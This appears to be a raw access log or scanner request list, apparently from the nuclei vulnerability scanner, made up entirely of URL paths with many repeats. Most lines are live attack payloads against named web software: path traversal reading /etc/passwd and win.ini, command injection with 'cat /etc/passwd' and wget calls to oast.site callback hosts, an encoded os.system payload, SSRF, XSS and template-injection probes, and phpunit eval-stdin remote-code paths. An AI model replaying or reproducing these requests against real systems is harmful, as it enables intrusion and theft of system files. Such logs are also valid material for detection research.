/web/solr/admin/cores?wt=json
/web/confluence/pages/createpage-entervariables.action
/web/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
/web/tools.cgi
/web/wiki/pages/createpage-entervariables.action?SpaceKey=x
/web/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
/web/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/web/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00
/web/password_change.cgi
/web/web/v1/kv/25Sm0FlRdZZkzrtM4sN7jmxKBVH
/web/wp-content/uploads/wp-security-audit-log/failed-logins/
/web/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4
/web/web/v1/kv/25Sm0FlRdZZkzrtM4sN7jmxKBVH?raw
/web/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/25Sm0H2PgEQQYRcndy6CDXZg9Db.jsp
/web/spaces/viewdefaultdecorator.action?decoratorName
/web/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/web/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://c8accf99m8v8l7afta3gcekcc4oyyyyfo.oast.site%23
/web/files.md5
/web/search.php?search=%22;wget+http%3A%2F%2Fc8accf99m8v8l7afta3gcekcc4eyyyyfc.oast.site%27;%22
/web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/v2/api/product/manger/getInfo
/web/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/system/sharedir.php
/web/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::
/web/en/php/usb_sync.php
/web/_snapshot/test
/web/_snapshot/test2
/web/struts2-rest-showcase/orders/3
/web/orders/3
/web/index.php?r=i/../../../../../etc/passwd
/web/wp-admin/admin.php?page=download_report&report=users&status=all
/web/web/cobbler_api
/web/loginLess/../../etc/passwd
/web/tests/support/stores/test_grid_filter.php?query=phpinfo();
/web/fmangersub?cpath=../../../../../../../etc/passwd
/web/?p=1
/web/EemAdminService/EemAdmin
/web/comm.php?id=../../../../../../../../../../etc/passwd
/web/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00
/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd
/web/wp-admin/admin-ajax.php
/web/web_shell_cmd.gch
/web/solr/admin/cores?wt=json
/web/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/25Sm0C7LHRdYmCQOsvl42YSw5bO.txt
/web/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
/web/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/web/document.php?modulepart=project&file=../../../../../../../etc/passwd
/web/wiki/pages/createpage-entervariables.action?SpaceKey=x
/web/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/web/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00
/web/password_change.cgi
/web/api/timelion/run
/web/wiki/pages/createpage-entervariables.action
/web/verify.php?id=1&confirm_hash=
/web/about_state
/web/wp-content/uploads/wp-security-audit-log/failed-logins/
/web/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/25Sm0H2PgEQQYRcndy6CDXZg9Db.jsp
/web/
/web/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F
/web/spaces/viewdefaultdecorator.action?decoratorName
/web/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://c8accf99m8v8l7afta3gcekcc4oyyyyfo.oast.site%23
/web/web/v1/kv/25Sm0FlRdZZkzrtM4sN7jmxKBVH?raw
/web/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/http_header.php
/web/files.md5
/web/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd
/web/wp-json/buddypress/v1/signup
/web/testrail/files.md5
/web/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/en/php/usb_sync.php
/web/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/web/_snapshot/test2
/web/orders/3
/web/index.php?r=i/../../../../../etc/passwd
/web/wp-admin/admin.php?page=download_report&report=users&status=all
/web/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/server/
/web/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/web/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E
/web/loginLess/../../etc/passwd
/web/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd
/web/fmangersub?cpath=../../../../../../../etc/passwd
/web/EemAdminService/EemAdmin
/web/services/user/values.xml?var=STATUS
/web/web_shell_cmd.gch
/web/cache/backup/
/web/wp-admin/admin.php
/web/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
/web/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/25Sm0C7LHRdYmCQOsvl42YSw5bO.txt
/web/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/web/getcfg.php
/web/document.php?modulepart=project&file=../../../../../../../etc/passwd
/web/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
/web/names.nsf/People?OpenView
/web/messages
/web/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
/web/wiki/pages/createpage-entervariables.action
/web/verify.php?id=1&confirm_hash=
/web/pages/doenterpagevariables.action
/web/mantis/verify.php?id=1&confirm_hash=
/web/about_state
/web/
/web/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
/web/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F
/web/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd
/web/http_header.php
/web/wp-json/buddypress/v1/signup
/web/testrail/files.md5
/web/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd
/web/api/snapshots
/web/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd
/web/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/web/login/?uid="><img%20src="x"%20onerror="alert(%27XSS%27);">
/web/Login?!'><sVg/OnLoAD=alert`1337`//
/web/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
/web/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/web/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/
/web/lab.html?vpath=//example.com
/web/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/web/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/server/
/web/PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E
/web/goform/setSysAdm
/web/jkstatus
/web/cache/backup/
/web/jkstatus;
/web/dashboard/uploadID.php
/web/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22
/web/getcfg.php
/web/names.nsf/People?OpenView
/web/messages
/web/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
/web/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
/web/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}
/web/?mobile=1&mp_idx=%22;alert(%271%27);//
/web//example.com/%2f..
/web/cgi-bin/logoff.cgi
/web/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd
/web/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/web/Umbraco/feedproxy.aspx?url=http://c8accf99m8v8l7afta3gcekcc5eyyyy8y.oast.site
/web/pages/doenterpagevariables.action
/web/mantis/verify.php?id=1&confirm_hash=
/web/pages/createpage.action?spaceKey=myproj
/web/mantisBT/verify.php?id=1&confirm_hash=
/web/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
/web/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/web/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd
/web/adm/file.cgi?next_file=%2fetc%2fpasswd
/web/api/snapshots
/web/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/goform/setSysAdm
/web/ui/vropspluginui/rest/services/getstatus
/web/Login?!'><sVg/OnLoAD=alert`1337`//
/web/PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E
/web/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/web/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/
/web/www/delivery/afr.php?refresh=10000&")',10000000);alert(1337);setTimeout('alert("
/web/viewlog.jsp
/web/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd
/web/login/?uid="><img%20src="x"%20onerror="alert(%27XSS%27);">
/web/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
/web/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
/web/static?/%2557EB-INF/web.xml
/web/jkstatus;
/web/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00
/web/%2f/
/web/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22
/web//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://c8accf99m8v8l7afta3gcekcc5oyyyy8n.oast.site)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
/web/html/repository
/web/upload
/web/sample-apps/hello/%2f/
/web/cgi-bin/logoff.cgi
/web/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}
/web/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}
/web/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/web/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
/web/DnnImageHandler.ashx?mode=file&url=http://c8accf99m8v8l7afta3gcekcc5oyyyy8g.oast.site
/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/web/pages/createpage.action?spaceKey=myproj
/web/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/web/Umbraco/feedproxy.aspx?url=http://c8accf99m8v8l7afta3gcekcc5eyyyy8y.oast.site
/web/mantisBT/verify.php?id=1&confirm_hash=
/web/ui/vropspluginui/rest/services/getstatus
/web/www/delivery/afr.php?refresh=10000&")',10000000);alert(1337);setTimeout('alert("
/web/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
/web/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
/web/pages/templates2/viewpagetemplate.action
/web/viewlog.jsp
/web/static?/%2557EB-INF/web.xml
/web/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
/web/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
/web//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://c8accf99m8v8l7afta3gcekcc5oyyyy8n.oast.site)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
/web/html/repository
/web/upload
/web/sample-apps/hello/%2f/
/web/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}
/web/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/web/node/1?_format=hal_json
/web/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/web/owa/auth/x.js
/web/password.html
/web/
/web/concat?/%2557EB-INF/web.xml
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/web/pandora_console/ajax.php?page=../../../../../../etc/passwd
/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/web/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
/web/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/web/context.json
/web/%2e/WEB-INF/web.xml
/web/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
/web/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
/web/agc/vicidial_mysqli_errors.txt
/web/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
/web/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
/web/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/
/web/index.php?class=../../../../../../../etc/passwd%00
/web/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
/web/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/fcgi-bin/wgsetcgi
/web/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/pages/templates2/viewpagetemplate.action
/web/pages/createpage-entervariables.action
/web/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
/web/../conf/config.properties
/web/gsearch.php.en?prod=';prompt`document.domain`;//
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/web/api/snapshots
/web/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/web/bugs/verify.php?confirm_hash=&id=1
/web/images/..%2finfo.html
/web/pandora_console/ajax.php?page=../../../../../../etc/passwd
/web/casa/nodes/thumbprints
/web/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
/web/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/web/context.json
/web/%2e/WEB-INF/web.xml
/web/composer/send_email?to=uxsb@VCLo&url=http://c8accf99m8v8l7afta3gcekcchyyyyy8q.oast.site
/web/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
/web/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt
/web/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22
/web/include/nuclei.txt
/web/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
/web/webtools/control/SOAPService
/web/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/index.php?class=../../../../../../../etc/passwd%00
/web/openam/oauth2/..;/ccversion/Version
/web/menu/stapp
/web/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
/web/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
/web/wp-content/plugins/quiz-master-next/README.md
/web/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php
/web/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1
/web/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E
/web/pages/createpage-entervariables.action
/web/template/custom/content-editor
/web/gsearch.php.en?prod=';prompt`document.domain`;//
/web/templates/editor-preload-container
/web/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/web/api/snapshots
/web/embed.js
/web/bugs/verify.php?confirm_hash=&id=1
/web/images/..%2finfo.html
/web/casa/nodes/thumbprints
/web/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
/web/composer/send_email?to=uxsb@VCLo&url=http://c8accf99m8v8l7afta3gcekcchyyyyy8q.oast.site
/web/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22
/web/webtools/control/SOAPService
/web/openam/oauth2/..;/ccversion/Version
/web/menu/stapp
/web/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
/web/webadmin/out
/web/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php
/web/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1
/web/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E
/web/templates/editor-preload-container
/web/users/user-dark-features
/web/embed.js
/web/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/webadmin/out
/web/users/user-dark-features
